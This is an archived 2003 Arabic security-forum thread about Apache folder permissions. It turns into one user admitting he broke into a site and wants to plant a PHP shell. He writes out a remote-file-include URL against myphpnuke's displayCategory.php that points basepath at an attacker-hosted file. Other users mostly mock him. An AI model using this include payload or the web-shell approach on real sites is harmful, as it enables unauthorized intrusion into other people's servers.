تغيير الصلاحيات على الـ apache [الأرشيف] - .:: منتديات العاصفة - اول منتدى عربي متخصص في التقنية والحماية ::.

مشاهدة النسخة كاملة : تغيير الصلاحيات على الـ apache

محمد السلمان

06-10-2003, 11:06

السلام عليكم

اخواني الكرام

أريد أمر لينكس أو apache من خلاله أتمكن من تغيير صلاحيات مجلد ويب للكتابة ، بحيث يمكنني إنشاء ملف جديد في مجلد الويب .

هل هناك أمر يا جماعة الخير ؟

وهل يوجد ملف confg خاص بصلاحيات المجلدات خاص بـ apache ؟ أين أجده وما هو اسمه ؟

:rolleyes:

hi_HaCkEr

06-10-2003, 11:31

الامر هو chmod

انشأ ملف بالامر mkdir

mkdir anyDirectory
وبعدها اعطيه الصلاحيات التي تريد

chmod xxx anyDirectory

xxx يعني الصلاحية المعاطة

محمد السلمان

07-10-2003, 08:14

شكرا أخي على الرد

وسأجرب وأرد عليك

محمد السلمان

07-10-2003, 12:43

حاولت ولكن طردني شر طردة

فالفزعة الله يرحم والديك

وموضعي هو أني اخترقت موقع عن طريق تشغيل كود php فيه وأريد تخزين ملف فيه ولكن حجر لي حسبي الله عليه ، وأتوقع لأني ... :rolleyes:

فتكفى وش الحل

:o:o:o

hi_HaCkEr

07-10-2003, 01:38

انا ما ني فاهم شئ

اش سويت بالضبط عشان اقدر اساعدك ...فصل اكثر

انت الحين هل عند شل اكاونت على السيرفر تقصد ولا ؟؟؟

وبالنسبة لتغيير صلاحيات مجلد الويب مثل لو تقصد public_html فلابد تكون رووت هذا اولا

بالنسبة لملف الكونفيق للاباتشي تجده بالامتداد

/etc/httpd/conf/httpd.conf

محمد السلمان

08-10-2003, 08:01

أخي العزيز

أريد تخزين ملف على جهاز الضحية ، عن طريق ثغرة وجدها في جهازه وهذه الثغرة هي تشغيل كود php في ذاكرة جهاز الضحية .

ففكرت بأن أقوم بإنشاء ملف وأضع فيه كود phpshell ولكن الموقع يرفض عندما أحاول فتح ملف فيه .
لأن المجلد غير قابل للكتابة

فأظن حل المشكلة في تغيير صلاحية هذا المجلد من ملف الـ httpd.conf .

وهذا حلي فيما أعتقد :rolleyes:

فما هو الحل يا أخي .
:confused::confused:

فهذه مشكلتي .
وأرجوا أن تكون واضحه

وعلى فكره ترى ما عندي لا user name و لا بطيخ .

وجزاك الله خيرا على تفاعلك

hi_HaCkEr

08-10-2003, 11:10

ما تقدر تعدل في الاباتشي الا اذا كنت رووت :)

محمد السلمان

08-10-2003, 01:30

يعني أقلب وجهي

مع السلامة

|91|

saso

08-10-2003, 10:36

هههههههههههههههههههههههههههههه

الهاوي

08-10-2003, 11:38

حلوه:D

باااااااااااااااي|4|

خالد7

09-10-2003, 04:50

هههههههههههههههههههههههههههههههههههههههههههههههههه هههههههههههههههههههههههههههههههههههههههههههههههههه ههههههه

الله يرجك من ولد

ابو سلمان ....اقول خيرها بغيرها يارجل ....:D:D:D

بس خوش سياره |3|

EVIL-MASTER

09-10-2003, 04:57

تقدر اخى تحدد لى نوع الثغرة وانا اقولك اذا كام ممكن ام لا

محمد السلمان

09-10-2003, 09:07

يعني يمكن تساعدني

كفوا والله بعدما طردني السيرفر طاح وجهي عند اخواني وعند جماعتي

بس الثغرة هي ثغرة الـ Include File والموجودة في myphpnuke وهي :

http://[target]/displayCategory.php?basepath=http://[attacker]/imagefunctions.php

فهنا قمت بإنشاء موقع يدعم الـ php ثم أنشأت ملف باسم imagefunctions.php وكتبت فيه كود يقوم بإنشاء ملف phpshell ولكن صار الي صار ، وسلامتك .

يا شين التحطم

|214|

محمد السلمان

09-10-2003, 09:13

الأخوة :
saso
الهاوي
خالد7

لا تفقعوني مرارتي زيادة .

|119|